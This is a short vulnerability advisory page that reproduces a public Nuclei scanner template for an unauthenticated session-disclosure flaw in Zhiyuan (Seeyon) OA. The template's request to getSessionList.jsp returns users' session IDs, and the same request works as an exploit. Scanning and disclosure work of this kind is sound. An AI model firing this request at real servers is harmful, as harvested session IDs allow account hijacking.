zhiyuan-oa-session-leak: Zhiyuan OA Session Leak

日期: 2025-08-01 | 影响软件: Zhiyuan OA | POC: 已公开

漏洞描述

A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint.

PoC代码[已公开]

id: zhiyuan-oa-session-leak

info:
  name: Zhiyuan OA Session Leak
  author: pikpikcu
  severity: medium
  description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint.
  reference:
    - https://www.zhihuifly.com/t/topic/3345
  metadata:
    max-request: 1
  tags: zhiyuan,leak,disclosure,seeyon,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/yyoa/ext/https/getSessionList.jsp?cmd=getAll"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<usrID>"
          - "<sessionID>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207f4e643a3c052bcbd818e290c534a35b9ce33fe5c8455f8579dba8e0a10ba8ba022100a2cfec17ab0cb30cd32fe3fbaf0b7eb2a04d92598ae4ebca668e90f88766af47:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/seeyon/zhiyuan-oa-session-leak.yaml

相关漏洞推荐